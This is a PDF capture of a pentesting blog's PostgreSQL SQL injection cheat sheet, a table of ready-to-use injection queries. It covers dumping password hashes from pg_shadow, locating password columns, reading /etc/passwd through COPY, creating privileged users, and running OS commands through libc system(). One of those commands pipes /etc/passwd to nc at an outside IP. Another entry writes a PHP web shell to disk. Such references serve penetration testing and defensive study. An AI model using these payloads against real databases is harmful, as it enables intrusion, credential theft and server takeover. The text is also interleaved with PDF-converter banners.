pentestmonkey

Taking the monkey work out of pentesting

Postgres SQL Injection Cheat Sheet

Some useful syntax reminders for SQL Injection into PostgreSQL databases…
Categories

Blog (78) This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it
easier to read and to use the same table for for each database backend. This helps to highlight any features which are
Cheat Sheets (10)
lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to
Shells (1) researching yet.
SQL Injection (7)
The complete list of SQL Injection Cheat Sheets I’m working is:

Contact (2) Oracle

Site News (3) MSSQL
Tools (17) MySQL
PostgreSQL
Audit (3) Ingres
Misc (7) DB2
Informix
User Enumeration (4)
Web Shells (3) I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.

Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the
Uncategorized (3) query.
Yaptest (15)
Version SELECT version()
Front End (1)
Installing (2) Comments SELECT 1; –comment
Overview (2) SELECT /*comment*/1;

Using (8) Current User SELECT user;

SELECT current_user;
RSS Feed SELECT session_user;

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 SELECT usename FROM pg_user;
SELECT getpgusername();

List Users SELECT usename FROM pg_user

List Password SELECT usename, passwd FROM pg_shadow — priv

Hashes

Password MDCrack can crack PostgreSQL’s MD5-based passwords.

Cracker

List Privileges SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user

List DBA SELECT usename FROM pg_user WHERE usesuper IS TRUE

Accounts

Current SELECT current_database()

Database

List Databases SELECT datname FROM pg_database

List Columns SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A,

pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid)
AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname
ILIKE ‘public’)

List Tables SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace

n ON n.oid = c.relnamespace WHERE c.relkind IN (‘r’,”) AND n.nspname NOT IN
(‘pg_catalog’, ‘pg_toast’) AND pg_catalog.pg_table_is_visible(c.oid)

Find Tables If you want to list all the table names that contain a column LIKE ‘%password%’:SELECT
From Column DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T
Name WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND
(A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE
‘public’) AND attname LIKE ‘%password%’;

Select Nth SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; — rows
Row numbered from 0
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;

Select Nth SELECT substr(‘abcd’, 3, 1); — returns c

Char

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Bitwise AND SELECT 6 & 2; — returns 2
SELECT 6 & 1; –returns 0

ASCII Value -> SELECT chr(65);

Char

Char -> ASCII SELECT ascii(‘A’);

Value

Casting SELECT CAST(1 as varchar);

SELECT CAST(’1′ as int);

String SELECT ‘A’ || ‘B’; — returnsAB

Concatenation

If Statement IF statements only seem valid inside functions, so aren’t much use for SQL injection.
See CASE statement instead.

Case SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; — returns A
Statement

Avoiding SELECT CHR(65)||CHR(66); — returns AB

Quotes

Time Delay SELECT pg_sleep(10); — postgres 8.2+ only

CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS ‘/lib/libc.so.6′, ‘sleep’
language ‘C’ STRICT; SELECT sleep(10); –priv, create your own sleep function. Taken
from here .

Make DNS Generally not possible in postgres. However if contrib/dblinkis installed (it isn’t by default)
Requests it can be used to resolve hostnames (assuming you have DBA rights):

SELECT * FROM dblink('host=put.your.hostname.here user=someuser

dbname=somedb', 'SELECT version()') RETURNS (result TEXT);

Alternatively, if you have DBA rights you could run an OS-level command (see below) to
resolve hostnames, e.g. “ping pentestmonkey.net”.

Command CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS ‘/lib/libc.so.6′,

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Execution ‘system’ LANGUAGE ‘C’ STRICT; — privSELECT system(‘cat /etc/passwd | nc 10.0.0.1
8080′); — priv, commands run as postgres/pgsql OS-level user

Local File CREATE TABLE mydata(t text);

Access COPY mydata FROM ‘/etc/passwd’; — priv, can read files which are readable by postgres
OS-level user
…’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1; — get data back one row
at a time
…’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2; — get data back one row
at a time …
DROP TABLE mytest mytest;Write to a file:

CREATE TABLE mytable (mycol text);

INSERT INTO mytable(mycol) VALUES (‘<? pasthru($_GET[cmd]); ?>’);
COPY mytable (mycol) TO ‘/tmp/test.php’; –priv, write files as postgres OS-level user.
Generally you won’t be able to write to the web root, but it’s always work a try.
– priv user can also read/write files by mapping libc functions

Hostname, IP SELECT inet_server_addr(); — returns db server IP address (or null if using local
Address connection)
SELECT inet_server_port(); — returns db server IP address (or null if using local
connection)

Create Users CREATE USER test1 PASSWORD ‘pass1′; — priv

CREATE USER test1 PASSWORD ‘pass1′ CREATEUSER; — priv, grant some privs at
the same time

Drop Users DROP USER test1; — priv

Make User ALTER USER test1 CREATEUSER CREATEDB; — priv

DBA

Location of SELECT current_setting(‘data_directory’); — priv

DB files SELECT current_setting(‘hba_file’); — priv

Default/System template0
Databases template1

Tags: cheatsheet, database, pentest, postgresql, sqlinjection

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Posted in SQL Injection

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD